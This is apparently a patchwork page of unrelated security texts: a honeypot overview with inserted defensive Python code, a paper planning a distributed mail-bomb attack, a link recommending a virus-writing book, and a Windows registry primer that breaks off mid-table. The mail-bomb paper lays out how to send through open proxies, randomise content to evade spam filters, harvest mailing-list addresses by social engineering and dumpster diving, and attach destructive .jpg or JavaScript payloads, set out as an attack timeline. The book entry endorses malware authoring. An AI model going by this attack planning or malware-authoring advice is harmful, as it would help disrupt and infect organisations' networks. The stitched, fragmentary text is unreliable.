High-interaction honeypots are different; they are usually complex solutions, as they involve real operating systems and applications. Nothing is emulated; we give attackers the real thing. If you want a Linux honeypot running an FTP server, you build a real Linux system running a real FTP server. The advantages of such a solution are twofold. First, you can capture extensive amounts of information. By giving attackers real systems to interact with, you can learn the full extent of their behavior, everything from new rootkits to international IRC sessions. The second advantage is that high-interaction honeypots make no assumptions about how an attacker will behave. Instead, they provide an open environment that captures all activity. This allows high-interaction solutions to learn behavior we would not expect. An excellent example of this is how a Honeynet captured encoded back door commands on a non-standard IP protocol (specifically IP protocol 11, Network Voice Protocol). However, this also increases the risk of the honeypot, as attackers can use these real operating systems to attack non-honeypot systems. As a result, additional technologies have to be implemented that prevent the attacker from harming other non-honeypot systems. In general, high-interaction honeypots can do everything low-interaction honeypots can do and much more. However, they can be more complex to deploy and maintain. Examples of high-interaction honeypots include Symantec Decoy Server and Honeynets. You can find a complete listing of both low- and high-interaction honeypots on the Honeypot Solutions page. To better understand both low- and high-interaction honeypots, let's look at two examples. We will start with the low-interaction honeypot Honeyd.

Honeyd: Low-interaction honeypot
Honeyd is a low-interaction honeypot. Developed by Niels Provos, Honeyd is open source and designed to run primarily on Unix systems (though it has been ported to Windows). Honeyd works on the concept of monitoring unused IP space. Any time it sees a connection attempt to an unused IP, it intercepts the connection and then interacts with the attacker, pretending to be the victim. By default, Honeyd detects and logs any connection to any UDP or TCP port. In addition, you can configure emulated services to monitor specific ports, such as an emulated FTP server monitoring TCP port 21. When an attacker connects to the emulated service, not only does the honeypot detect and log the activity, but it captures all of the attacker's interaction with the emulated service. In the case of the emulated FTP server, we can potentially capture the attacker's login and password, the commands they issue, and perhaps even learn what they are looking for or their identity. It all depends on the level of emulation by the honeypot. Most emulated services work the same way. They expect a specific type of behavior, and then are programmed to react in a predetermined way. If attack A does this, then react this way. If attack B does this, then respond this way. The limitation is that if the attacker does something the emulation does not expect, it does not know how to respond. Most low-interaction honeypots, including Honeyd, simply generate an error message. You can see what commands the emulated FTP server for Honeyd supports by reviewing the source code.
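To make the "expected behavior, predetermined response" idea concrete, here is a small low-interaction FTP emulation in Python. It is an added example, not Honeyd's code or its FTP script: the banner and reply strings are constructed to resemble a common Unix FTP daemon, the bind address and port (127.0.0.1:2121) are assumptions, and the `replay` helper exists so the dialogue can be exercised without a network. It captures the USER/PASS pair, answers a few harmless commands, and returns a generic 500 for anything unscripted, which is exactly the limit the paragraph describes.

```python
# Added example, not Honeyd's code or its FTP script: the "expected command,
# predetermined reply" style of emulation described above, as a fake FTP login
# that never succeeds but records everything. Banner and replies are constructed
# to resemble a common Unix daemon; the bind address and port are assumptions.
import json
import socketserver
import time

BANNER = "220 (vsFTPd 2.0.5)\r\n"        # constructed; pick one matching the OS you emulate


class FtpEmulation:
    """One attacker session: a handful of scripted commands, 500 for everything else."""

    REPLIES = {
        "SYST": "215 UNIX Type: L8\r\n",
        "FEAT": "211-Features:\r\n PASV\r\n211 End\r\n",
        "PWD": '257 "/"\r\n',
        "TYPE": "200 Switching to Binary mode.\r\n",
        "NOOP": "200 NOOP ok.\r\n",
        "QUIT": "221 Goodbye.\r\n",
    }

    def __init__(self, peer):
        self.peer = peer
        self.user = None
        self.credentials = []   # (user, password) pairs the attacker tried
        self.log = []           # every raw line, timestamped; all of it is suspicious by construction

    def handle(self, line):
        self.log.append({"ts": time.time(), "peer": self.peer, "line": line.rstrip("\r\n")})
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            self.user = arg
            return "331 Please specify the password.\r\n"
        if cmd == "PASS":
            self.credentials.append((self.user, arg))
            return "530 Login incorrect.\r\n"       # never let them in; they keep guessing
        if cmd in self.REPLIES:
            return self.REPLIES[cmd]
        # The emulation's limit: anything unscripted gets a generic error, which is
        # also how a careful attacker eventually tells this apart from a real server.
        return "500 Unknown command.\r\n"


def replay(lines, peer="198.51.100.7"):
    """Drive one session offline from a list of attacker lines; returns (session, replies)."""
    emu = FtpEmulation(peer)
    return emu, [emu.handle(line) for line in lines]


class Handler(socketserver.StreamRequestHandler):
    def handle(self):
        emu = FtpEmulation(self.client_address[0])
        self.wfile.write(BANNER.encode())
        for raw in self.rfile:                       # one command per line
            reply = emu.handle(raw.decode("ascii", errors="replace"))
            self.wfile.write(reply.encode())
            if reply.startswith("221"):
                break
        for entry in emu.log:                        # everything seen is worth an alert
            print(json.dumps(entry))
        for user, password in emu.credentials:
            print(json.dumps({"peer": emu.peer, "event": "login_attempt",
                              "user": user, "password": password}))


if __name__ == "__main__":
    # Bind to an address and port nothing legitimate uses; 2121 avoids needing root for 21.
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(("127.0.0.1", 2121), Handler) as server:
        server.serve_forever()
```

Every logged line is an alert candidate by construction, since nothing legitimate should connect to the address; that is what the "small data sets of high value" advantage above means in practice. The generic 500 is also the honeypot's weakness: an attacker who sends HELP, STAT or a deliberately malformed command and compares the responses against a real daemon's will notice the gap, which is the detection problem the paragraph warns about.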

Some honeypots, such as Honeyd, can not only emulate services but emulate actual operating systems. In other words, Honeyd can appear to the attacker to be a Cisco router, a WinXP webserver, or a Linux DNS server. There are several advantages to emulating different operating systems. First, the honeypot can better blend in with existing networks if it has the same appearance and behavior as production systems. Second, you can target specific attackers by providing systems and services they often target, or systems and services you want to learn about. There are two elements to emulating operating systems. The first is the emulated services. When an attacker connects to an emulated service, you can have that service behave like, and appear to be, a specific OS. For example, if you have a service emulating a webserver and you want your honeypot to appear to be a Win2000 server, then you would emulate the behavior of an IIS webserver. For Linux, you would emulate the behavior of an Apache webserver. Most honeypots emulate OSes in this manner. Some sophisticated honeypots take this emulation one step farther (as Honeyd does). Not only do they emulate at the service level, but at the IP stack level. If someone uses active fingerprinting measures to determine the OS type of your honeypot, most honeypots respond with the IP stack of whatever OS the honeypot is installed on. Honeyd spoofs the replies, making not only the emulated services but the emulated IP stacks behave as the chosen operating systems would. The level of emulation and sophistication depends on what honeypot technology you choose to use.

Honeynets: High-interaction honeypot
Honeynets are a prime example of a high-interaction honeypot. Honeynets are not a product; they are not a software solution that you install on a computer. Instead, Honeynets are an architecture, an entire network of computers designed to be attacked. The idea is to have an architecture that creates a highly controlled network, one where all activity is controlled and captured. Within this network we place our intended victims, real computers running real applications. The bad guys find, attack, and break into these systems on their own initiative. When they do, they do not realize they are within a Honeynet. All of their activity, from encrypted SSH sessions to emails and file uploads, is captured without them knowing it. This is done by inserting kernel modules on the victim systems that capture all of the attacker's actions. At the same time, the Honeynet controls the attacker's activity. Honeynets do this using a Honeywall gateway. This gateway allows inbound traffic to the victim systems, but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim systems, but prevents the attacker from harming other non-Honeynet computers. An example of such a deployment can be seen in Figure 1.

Value of Honeypots
Now that we have an understanding of the two general categories of honeypots, we can focus on their value; specifically, how we can use honeypots. Once again, we have two general categories: honeypots can be used for production purposes or for research. When used for production purposes, honeypots are protecting an organization. This would include preventing, detecting, or helping organizations respond to an attack. When used for research purposes, honeypots are being used to collect information. This information has different value to different organizations. Some may want to study trends in attacker activity, while others are interested in early warning and prediction, or law enforcement. In general, low-interaction honeypots are often used for production purposes, while high-interaction honeypots are used for research purposes. However, either type of honeypot can be used for either purpose. When used for production purposes, honeypots can protect organizations in one of three ways: prevention, detection, and response. We will take a more in-depth look at how a honeypot can work in all three.

Honeypots can help prevent attacks in several ways. The first is against automated attacks, such as worms or auto-rooters. These attacks are based on tools that randomly scan entire networks looking for vulnerable systems. If vulnerable systems are found, these automated tools will then attack and take over the system (with worms self-replicating, copying themselves to the victim). One way that honeypots can help defend against such attacks is by slowing their scanning down, potentially even stopping them. Called sticky honeypots, these solutions monitor unused IP space. When probed by such scanning activity, these honeypots interact with and slow the attacker down. They do this using a variety of TCP tricks, such as advertising a TCP window size of zero, putting the attacker into a holding pattern. This is excellent for slowing down or preventing the spread of a worm that has penetrated your internal organization. One such example of a sticky honeypot is the LaBrea Tarpit. Sticky honeypots are most often low-interaction solutions (you could almost call them 'no-interaction solutions', as they slow the attacker down to a crawl). Honeypots can also protect your organization from human attackers. The concept is deception or deterrence. The idea is to confuse an attacker, to make him waste his time and resources interacting with honeypots. Meanwhile, your organization has detected the attacker's activity and has the time to respond and stop the attacker. This can be taken one step farther. If an attacker knows your organization is using honeypots, but does not know which systems are honeypots and which are legitimate computers, they may be concerned about being caught by honeypots and decide not to attack your organization. Thus the honeypot deters the attacker. An example of a honeypot designed to do this is the Deception Toolkit, a low-interaction honeypot.

The second way honeypots can help protect an organization is through detection. Detection is critical; its purpose is to identify a failure or breakdown in prevention. Regardless of how secure an organization is, there will always be failures, if for no other reason than that humans are involved in the process. By detecting an attacker, you can quickly react to them, stopping or mitigating the damage they do. Traditionally, detection has proven extremely difficult to do. Technologies such as IDS sensors and system logs have proven ineffective for several reasons: they generate far too much data, a large percentage of false positives, an inability to detect new attacks, and an inability to work in encrypted or IPv6 environments. Honeypots excel at detection, addressing many of these problems of traditional detection. Honeypots reduce false positives by capturing small data sets of high value, capture unknown attacks such as new exploits or polymorphic shellcode, and work in encrypted and IPv6 environments. You can learn more about this in the paper Honeypots: Simple, Cost Effective Detection. In general, low-interaction honeypots make the best solutions for detection. They are easier to deploy and maintain than high-interaction honeypots and have reduced risk.

The third and final way a honeypot can help protect an organization is in response. Once an organization has detected a failure, how do they respond? This can often be one of the greatest challenges an organization faces. There is often little information on who the attacker is, how they got in, or how much damage they have done. In these situations, detailed information on the attacker's activity is critical. There are two problems compounding incident response. First, often the very systems compromised cannot be taken offline to analyze. Production systems, such as an organization's mail server, are so critical that even though they have been hacked, security professionals may not be able to take the system down and do a proper forensic analysis. Instead, they are limited to analyzing the live system while it is still providing production services. This cripples the ability to analyze what happened, how much damage the attacker has done, and even whether the attacker has broken into other systems. The other problem is that even if the system is pulled offline, there is so much data pollution that it can be very difficult to determine what the bad guy did. By data pollution, I mean there has been so much activity (users logging in, mail accounts read, files written to databases, etc.) that it can be difficult to determine what is normal day-to-day activity and what is the attacker. Honeypots can help address both problems. Honeypots make an excellent incident response tool, as they can quickly and easily be taken offline for a full forensic analysis without impacting day-to-day business operations. Also, the only activity a honeypot captures is unauthorized or malicious activity. This makes hacked honeypots much easier to analyze than hacked production systems, as any data you retrieve from a honeypot is most likely related to the attacker. The value honeypots provide here is quickly giving organizations the in-depth information they need to rapidly and effectively respond to an incident. In general, high-interaction honeypots make the best solution for response. To respond to an intruder, you need in-depth knowledge of what they did, how they broke in, and the tools they used. For that type of data you most likely need the capabilities of a high-interaction honeypot.

Up to this point we have been talking about how honeypots can be used to protect an organization. We will now talk about a different use for honeypots: research. Honeypots are extremely powerful; not only can they be used to protect your organization, but they can be used to gain extensive information on threats, information few other technologies are capable of gathering. One of the greatest problems security professionals face is a lack of information or intelligence on cyber threats. How can we defend against an enemy when we don't even know who that enemy is? For centuries military organizations have depended on information to better understand who their enemy is and how to defend against them. Why should information security be any different? Research honeypots address this by collecting information on threats. This information can then be used for a variety of purposes, including trend analysis, identifying new tools or methods, identifying attackers and their communities, early warning and prediction, or motivations. One of the most well known examples of using honeypots for research is the work done by the Honeynet Project, an all-volunteer, non-profit security research organization. All of the data they collect is gathered with Honeynets distributed around the world. As threats are constantly changing, this information is proving more and more critical.

Getting Started
If you have never worked with honeypots before and want to learn more, I recommend starting with simple low-interaction honeypots, such as KFSensor or Specter for Windows users, or Honeyd for Unix users. There is even a Honeyd Linux Toolkit for easy deployment of Honeyd on Linux computers. Low-interaction honeypots have the advantage of being easier to deploy and carrying little risk, as they contain the activity of the attacker. Once you have had an opportunity to work with low-interaction solutions, you can take the skills and understanding you have developed and work with high-interaction solutions. To help you better understand honeypots, below is a chart summarizing what we just covered.

Low-interaction
Solution emulates operating systems and services.


* Easy to install and deploy. Usually requires simply installing and configuring software on a computer.

* Minimal risk, as the emulated services control what attackers can and cannot do.

* Captures limited amounts of information, mainly transactional data and some limited interaction.



High-interaction
No emulation, real operating systems and services are provided.


* Can capture far more information, including new tools, communications, or attacker keystrokes.

* Can be complex to install or deploy (commercial versions tend to be much simpler).

* Increased risk, as attackers are provided real operating systems to interact with.


Finally, no paper on honeypots would be complete without a discussion of legal issues. There are many misconceptions about the legal issues of honeypots. Instead of briefly covering the legal issues in this paper, I will be releasing a new paper at the end of May, 2003 dedicated to the legal issues of honeypot technologies.

Conclusion
The purpose of this paper was to define what honeypots are and their value to the security community. We identified two different types of honeypots, low-interaction and high-interaction. Interaction defines how much activity a honeypot allows an attacker. The value of these solutions lies in both production and research purposes. Honeypots can be used for production purposes by preventing, detecting, or responding to attacks. Honeypots can also be used for research, gathering information on threats so we can better understand and defend against them. If you are interested in learning more about honeypots, you may want to consider the book Honeypots: Tracking Hackers, the first and only book dedicated to honeypot technologies.



Mail Bombing  

Mail "bombing" is perhaps one of the oldest, and certainly considered one of the "lamest" (that is to say, ineffective and immature), methods of "attack" available to the would-be "script kiddie" or otherwise malicious user online, dating back to the first time someone realised hundreds of irrelevant emails sent to someone else's inbox could be an extreme, and most importantly time-wasting, annoyance. The theory behind the attack is relatively simple: flood your chosen target's inbox with as many junk emails as possible over a given period; for example, an attacker may devote a few hours' run time to sending the "bomb". In practice the attack is easily achieved, with varying degrees of success, by any number of specifically designed programs able to send thousands, if not tens of thousands, of emails on command over a relatively short space of time.



However, a flaw developed in this attack strategy (which at its conception was in fact quite effective). As the internet developed from an academic into a more commercial institution, and due to the vast swathes of Spam (i.e. junk mail) online, complex and often very effective anti-Spam (in this context interchangeable with the term "anti-junk") backend software (such as White Mail, www.whitemail.ie) has been developed with the sole purpose of preventing junk mail arriving in users' inboxes.

Such software effectively nullifies a traditional Mail Bomb attack by such methods as:

a) blocking incoming mail from an IP when an inordinate or inappropriate number of emails have been received from that IP;

b) filtering emails by topic and content, blocking any which sophisticated backend databases consider to be Spam; or
c) blocking known "problem" IPs (that is to say, open relays or Spam-generating hosts) in the first place.

But could you increase a theoretical mail bomb's effectiveness if you were to randomise the bomb's origin IP and content, and how effective could such an attack be?

Additionally, if it is possible to increase the effectiveness of a mail bomb as an unconventional Denial of Service attack, would that increase be further amplified by specifically targeting it at one organisation, with the intention of causing not only the traditional virtual damage (in terms of network bandwidth etc.) but also maximum disruption to the target's "wetware" network, that is to say the real-life employees, by exposing them directly to an online attack?


2. Method

The first objective was to locate sufficient open proxies capable, one way or another, of relaying outgoing mail. This did not prove to be any great challenge. A short search online located at least one extremely efficient piece of third-party software which downloads an updated list of open proxies specifically for this task on demand.

The specific software will not be named, in the interests of not unnecessarily increasing the possibility of malicious users actually utilising this attack or, indeed, of it becoming widespread; likewise any custom code used in the research for this paper. However, it is important to recognise that such software, if not already existent, could easily be written; perhaps more dangerously, it could be written directly into purpose-coded mail bomb software, even to the alarmingly sophisticated extent of being able to spoof not only an email's domain of origin but ALL aspects of the email header, on a multithreaded and randomised basis, thus totally cloaking the origin of the attack. The theory is sound.

The next objective was to decide on a suitable target. I chose to speak to an employee of whitemail.ie, wanting to test this theoretical attack against the might of the White Mail back engine, one of the better anti-Spam solutions on the market.

To my surprise, the White Mail engine was practically defenceless against a targeted, mass-distributed mail bomb attack, as I will assume all "anti-spam" backend software is, simply and understandably because such software is not designed to defend against such attacks. The multithreaded nature of the attack (that is to say, multi-angled from an origin perspective) makes blocking it a very complicated affair. You cannot protect a target by simply blocking an attacker's IP address after a disproportionate number of mails. Furthermore, topic and content can be carefully but definitively randomised to contain only non-spam-related keywords, such as, for example:

Subject: Cheers.

Content: Thanks for letting this mail arrive. Great help to me!




It is highly unlikely that any existing Spam-blocking backend will filter out such inconspicuous emails. They simply do not contain any words or phrases which an anti-Spam database will consider threatening, or at least threatening enough to block. Additionally, as pointed out to me by a number of industry-related individuals while discussing this issue, attaching .pdf files of a suitably large size will also often ALLOW emails to slip past anti-Spam software, for the equally simple reason that there is no reason to maliciously send a .pdf, as it is largely impossible for them to be in any way malicious; other than perhaps in the case of this theoretical distributed mail bomb attack, that is.
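The point made in the last two paragraphs, that blocking by source address cannot stop a bomb spread across thousands of relays, can be checked with a few lines of code. The example below is added here and is not taken from the paper; it models no real product (White Mail's internals are not described on this page) and runs on constructed traffic: 2,000 one-off messages from 2,000 distinct stand-in relay addresses to one mailbox, mixed with a little ordinary office mail. A sliding-window rate limiter keyed on the sending IP lets all of it through; the same limiter keyed on the recipient address catches it while leaving the normal mail alone. The thresholds are illustrative.

```python
# Added example, not from the paper: why per-source throttling misses a
# distributed mail bomb while per-recipient throttling catches it. Traffic is
# constructed (2,000 one-off messages from 2,000 distinct stand-in relays to one
# mailbox, plus a little normal mail); no real product's filter is modelled.
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` events per key within any `window` seconds."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.seen = defaultdict(deque)       # key -> timestamps still inside the window

    def allow(self, key, now):
        q = self.seen[key]
        while q and now - q[0] > self.window:
            q.popleft()
        q.append(now)                        # count the event whether or not it is allowed
        return len(q) <= self.limit


def filter_mail(messages, by_source=None, by_recipient=None):
    """Run (timestamp, source_ip, recipient) records through the limiters; returns (delivered, blocked)."""
    delivered = blocked = 0
    for ts, src, rcpt in sorted(messages):
        checks = [(by_source, src), (by_recipient, rcpt)]
        # consult every configured limiter so each one keeps an accurate count
        verdicts = [lim.allow(key, ts) for lim, key in checks if lim is not None]
        if all(verdicts):
            delivered += 1
        else:
            blocked += 1
    return delivered, blocked


def constructed_traffic(bomb_size=2000, duration=600.0, target="accounts@target.example"):
    """Constructed delivery log: a distributed bomb spread over `duration` seconds plus normal office mail."""
    msgs = []
    for i in range(bomb_size):
        # every message comes from a different relay, so no per-source counter ever exceeds 1
        proxy = f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"   # stand-in for an open proxy
        msgs.append((i * duration / bomb_size, proxy, target))
    for j in range(50):
        # ten colleagues each receiving five messages from the company's own relay
        msgs.append((j * duration / 50, "192.0.2.10", f"user{j % 10}@target.example"))
    return msgs


if __name__ == "__main__":
    log = constructed_traffic()
    print("per source   ", filter_mail(log, by_source=SlidingWindowLimiter(50, 600)))
    print("per recipient", filter_mail(log, by_recipient=SlidingWindowLimiter(100, 600)))
```

Keying the limit on the destination (mailbox, list address or domain) is the generic countermeasure because it is the one thing a distributed sender cannot randomise; the source address, subject and body all can be. A real deployment would tune the threshold per list and answer the excess with a temporary 4xx deferral rather than a hard rejection, so that a legitimate burst is delayed instead of lost.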


3. The Attack Vector

In order to attack a target one must first locate as many email addresses on the targeted network as possible. This would be the first task of any would-be mass mail bomber. The most obvious, most effective and indeed simplest attack vector for this is internal mailing lists.

I sent out a questionnaire to a number of IT staff and network administrators to ascertain the legitimacy of my proposed attack vector, knowing already from my own experience that a high proportion of internal mailing lists are open to receiving email from the internet, as opposed to the perhaps safer practice of limiting access to such addresses to the local intranet.

The questions posed were:

1) Does your company use mailing lists for departmental email notifications?

2) If so, are the mailing lists usable from "Net Side"?

One hundred per cent of the questionnaires returned a positive answer to the first question and of those fifty per cent of them returned a positive answer to the second question.

We can conclude roughly from this (without conducting detailed research into the common state of this attack vector over a much wider cross-section, which, although in the long term very possibly worth doing, was not the main aim of this particular investigation) that around fifty per cent of corporate (or commercial) networks are vulnerable to a theoretical targeted distributed mass mail bomb attack.

With the attack vector legitimised and confirmed, the next problem for a would-be attacker would be to attain the actual email addresses to bomb. Such addresses can be procured in a number of ways, perhaps the simplest of which being trial and error test mails to the most common possibilities, i.e. accounts@target, marketing@target, etc.

It is also possible (if a little unlikely) that you could socially engineer an answer from the target themselves. It may sound ridiculous to suggest that you could simply phone a target's switchboard, ask for accounts, then simply request the departmental mailing list address; but stranger things have happened, and with the right degree of skill and a strong cover story anything can be achieved with social engineering. The weakest link in a network is often its users.

Naturally there are other, perhaps more sophisticated, methods of obtaining internal mailing list addresses; if one was, for example, to gain access either on site (a job interview, obviously under a false name) or remotely to the network intranet (back-to-basics hacking), it is highly likely that such lists could be easily located. Additionally, 'trashing' (the practice of going through waste bins for information) a target is also likely to yield enough of the internal addresses necessary for this attack to be effective.

There is also always the possibility of 'brute force' bombing: first ascertaining the common syntax of email addresses for your target (i.e. first.surname@target or name@target etc.), then emailing random combinations of names to the targeted network using our theoretical mail bombing software and a database of names (which is probably available or otherwise relatively easily constructed). Although from the attacker's point of view this would take longer and has a definitely lower degree of effectiveness, it is nevertheless likely to be effective to at least some degree, largely dependent on how the post office on the target network deals with emails with unknown target addresses. The very worst case positive scenario for the attacker would be to utterly swamp a post office which sends all unknown mail to the postmaster (still not an uncommon practice) with all the mails that were aimed at random combinations of words/names; a result which still achieves some of the desired effect (i.e. an increase in the Total Cost of System, such factors to be discussed in more detail later).

It is also important here to note the potential damage that could be caused by various attachments if used in a suitably cunning manner; adding .pdf attachments to mails to feign legitimacy has already been mentioned, but now consider for a moment the possibility of including compromised .jpg's (i.e. .jpg's which have been altered to contain code which executes when opened in certain Microsoft software; a recently patched but likely still extremely viable secondary theoretical factor in this attack).

Such .jpg's, for example, within a .html based email (perhaps as the focus of the mail, perhaps as a false company logo etc.) could become a very effective tool. Dependent on what code you choose to add to these .jpg's, all manner of havoc could be wreaked upon an unsuspecting intranet. The downside to this from an attacking point of view is the inherent increase in the likelihood of detection by anti-Spam or anti-Virus software when adding known malicious code or exploits to your mass mails. However, when talking about this theoretical attack one must always remember its a) distributed and b) mass nature. If you send five thousand emails and only three thousand make it past whatever defences there may be, that can still be considered an effective attack within the context of the theory. The key here would be utilising the attack vector to deliver a new, perhaps unknown, virus or exploit.


4. Fictional Timeline

Imagine that the internal mailing lists for following departments within the target are procured and confirmed: accounts@ sales@ humanresources@.

Outside the target's posted business hours, five thousand emails are sent to each of the procured addresses (a relatively low amount). On a random basis some contain large legitimising .pdf attachments, some contain .jpg's infected with virus code designed to destroy the working system directory on infected machines (you can interchange the use of .jpg's here with any Java based attack, past, present or future, and the designation to destroy the system directory with just about anything you can imagine, more subtle or otherwise).

Additional emails are sent spoofing localhost domains of the target and instructing users to execute more infected .jpg's (or JavaScript) in order to read instructions on how to cope with the incident. This will further increase the likelihood of any malicious code which makes it past anti-virus software actually being executed.

Employees arrive for work to discover a vastly disproportionate number of emails in their inboxes, lost amongst which is their legitimate email. The common and indeed procedural response (confirmed by another question posed on this paper's distributed research questionnaire) would be to either phone the IT department or lodge a formal request for IT help on a ticket system of some kind. It would not take long for an IT department to become swamped.

Some employees would, statistically, fall for the ruse, adding a more traditional digital attack to the primarily "Wet Ware based DoS" already caused by the sheer number of mails that have arrived. Put simply: the more "traps" you send, the more likely someone is to trip one, and ultimately an exploit is to be executed. It is an unfortunate fact that a high proportion of non "IT Department" staff do not have sufficient computing knowledge to identify such threats. One professional went as far as commenting "The business I currently contract all my time out to? hopeless. Utterly hopeless." in answer to the question "How would you rate the general IT knowledge within your company?" on this paper's research questionnaire. A response that can only be encouraging to would-be attackers in all shapes and forms.

The additional question "Generally speaking do non-IT related employees in your company understand the risks associated with Windows related exploits?" was posed, to which the common answer was a resounding "No."

From this we can conclude with a high degree of certainty that unless the network was entirely and faultlessly patched (an attacker would naturally use the most recently discovered or indeed unknown home-grown exploits), infection and/or severe damage to at least some target machines would be unavoidable.

5. Effects

The effects on the target network would thus be fivefold:

1) Employees unable to sort their own legitimate email from a mass of junk mail and thus only able to carry out their usual function with varying degrees of success (depending on their function in the first place; sales@ in this fictional scenario being perhaps most affected by this element of the "Wet Ware DoS"). This is the primary effect of the attack.
2) A swamped IT department, perhaps unable to respond as quickly as it should to any additional threat levelled at it (for example a more conventional DoS attack).
3) Actual lost or damaged data within the target network.
4) Depending on the code added to the planted .jpg's/JavaScript: viral infection of the network, possibly resulting in remote access doors being opened (naturally depending on the firewall software/hardware located at the target), effectively making this DoS a possible cover for the planting of a further future attack vector in the form of Trojans, or even perhaps data miners searching for specific data and emailing or otherwise sending such data back to a specified location. It pains one to imagine what information could be deliberately searched for on a targeted network: bank account details, employee personal details, perhaps even full and detailed lists of the target's email addresses (which could aid an attacker in sustaining the attack if the net side internal mailing lists were disabled by the target's network administrators; a sensible first line of defence). The possibilities are endless.
5) Ultimately the DoS causes a vast increase in the Total Cost of System for the target, which will last as long as it takes to both disinfect the system and to purge all post boxes of junk mail. The beauty of this is that it is so simple to execute; the DoS could be automated, a process set up to attack the target every day at a certain time, with no method of blocking such an attack being immediately obvious. Without taking drastic measures to block every IP from the distributed attack (a thankless task, given the fact that there are always more proxies), this form of attack has the frightening potential to cripple a target's email indefinitely.


6. Conclusion

Due to the relatively obscure and surprising nature of this DoS (mail bombing is not commonly used to disrupt in such an organised manner), combined with the fact that the current generation of email filtering software (anti-Spam/anti-viral backends) is ill prepared to deal with such attacks, it is theoretically potentially disastrous to any target with an identified open main attack vector (that is to say, mainly net side internal mailing lists), and is additionally equally as dangerous if a malicious user can otherwise identify, en masse, lists of email addresses relating to the target (via trashing and the other methods discussed earlier).

On top of the primary effect, i.e. the confusion and disruption potentially caused by this attack in its purest form, it is also an effective and dangerous delivery system for, in particular, un-patched or new exploits/virii. An effective method for blocking such attacks needs to be developed before any damage is caused by one.
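The paper closes by calling for a blocking method. As an added, defender-side example that is not part of the paper, the following Python sketch implements the simplest early-warning check its argument implies: per recipient address (such as the internal list addresses the attack relies on), count deliveries in a sliding time window together with the number of distinct sending hosts, and flag the address when both exceed a threshold, since many messages from many sources to one list address is the signature of a distributed run rather than of one chatty legitimate sender. The log-line format, the thresholds and the sample entries are all assumptions constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Log format is an assumption for this example: "<date> <time> client=<ip> to=<addr>".
# Adapt LINE_RE to the real MTA log format before use.
LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) client=(\S+) to=<([^>]+)>$")


def detect_bursts(lines, window=timedelta(minutes=10), max_msgs=20, min_sources=5):
    """Sliding-window check per recipient address.

    Flags a recipient once more than `max_msgs` deliveries for it fall inside
    `window` and they come from at least `min_sources` distinct client IPs.
    Returns {recipient: (peak_messages_in_window, distinct_sources_at_peak)}.
    """
    recent = defaultdict(deque)  # recipient -> deque of (timestamp, client_ip)
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        client, rcpt = m.group(2), m.group(3).lower()
        q = recent[rcpt]
        q.append((ts, client))
        while q and ts - q[0][0] > window:
            q.popleft()  # drop deliveries that fell out of the window
        sources = {c for _, c in q}
        if len(q) > max_msgs and len(sources) >= min_sources:
            # keep the worst observation seen for this recipient
            alerts[rcpt] = max(alerts.get(rcpt, (0, 0)), (len(q), len(sources)))
    return alerts


def build_sample_log():
    """Constructed sample, not real traffic: 40 deliveries to sales@ within four
    minutes from 20 different documentation-range addresses, followed by two
    ordinary deliveries to accounts@ from a single host."""
    start = datetime(2008, 2, 11, 3, 0, 0)
    lines = []
    for i in range(40):
        ts = start + timedelta(seconds=6 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} client=198.51.100.{i % 20 + 1} to=<sales@example.com>")
    lines.append("2008-02-11 09:15:00 client=203.0.113.5 to=<accounts@example.com>")
    lines.append("2008-02-11 09:20:00 client=203.0.113.5 to=<accounts@example.com>")
    return lines


if __name__ == "__main__":
    for rcpt, (count, sources) in detect_bursts(build_sample_log()).items():
        print(f"burst to {rcpt}: {count} messages from {sources} sources")
```

An address the check flags is a candidate for temporary inbound rate limiting or for restricting the list to the intranet, the first line of defence the paper itself names; the distinct-source condition keeps a single busy but legitimate relay from tripping the alert.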


Virus programming book

The Giant Black Book of Computer Viruses
Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-10-1
1995


Check it out :- http://vx.netlux.org/lib/vml01.html

Very good book for virus programmers


What is registry  

The registry is a database that stores all of the operating system's configuration and information. The Registry Editor tool is located by default in the System folder. The 16-bit Windows 95/98/ME Registry tool (application) is called "Regedit.exe", while 32-bit Windows NT4/2000/XP/2003 have both the "Regedit.exe" and "Regedt32.exe" applications. The files that compose the registry in Windows 95/98/ME are "system.dat" and "user.dat". On Windows NT/2000/XP/2003 the files are "SOFTWARE", "SYSTEM", "SECURITY" and "SAM".

Main

To open the Registry Editor tool go to "Start" -> "Run" and type "regedit" without the quotes. The "Regedit" window will appear and you will see a main element, "My Computer". When you double-click it you will see the Registry "ROOT KEYS". They have a folder icon and they are like directories. There are 5 root keys. PS: Windows 95 and 98 have a 6th root key called HKEY_DYN_DATA. A table is available below with the root key names and a basic description of each of them.





ROOT KEY             Description
-------------------  ------------------------------------------------------------------------
HKEY_LOCAL_MACHINE   Contains configuration information specific to the computer (valid for any user).
HKEY_CURRENT_USER    Contains the configuration information for the currently logged-on user. Screen, colour, Control Panel and folder settings are stored here. This information is called the "User Profile".
HKEY_USERS           Contains the profiles of all users on the computer. HKEY_CURRENT_USER is a sub-key of HKEY_USERS.
HKEY_CLASSES_ROOT    A sub-key of HKEY_LOCAL_MACHINE\SOFTWARE. The information stored here guarantees that the correct program is executed when you open a file using Windows Explorer.
HKEY_CURRENT_CONFIG  Contains information about the hardware profile used by the local computer at system startup.
HKEY_DYN_DATA        (Windows 95, 98 and 98SE only) Contains configuration information that is stored in RAM and statistics gathered for the network components currently in use on the computer. The information in this key is recreated on every Windows startup.





Those root keys above have keys with sub-keys (left side of the Registry panel). The keys and sub-keys contain values of a valid type with some data (right side of the Registry panel). These values contain information such as strings and numbers. Some numbers have a specific meaning that will affect the Windows configuration depending on what they are set to. The Windows 9x/ME Registry editor seems to only fully read the REG_SZ, REG_DWORD and REG_BINARY value types. It doesn't display the type in the "Regedit" window, only the value names and their respective data. The following table provides a quick description of the value types and their properties.

Type                            Description
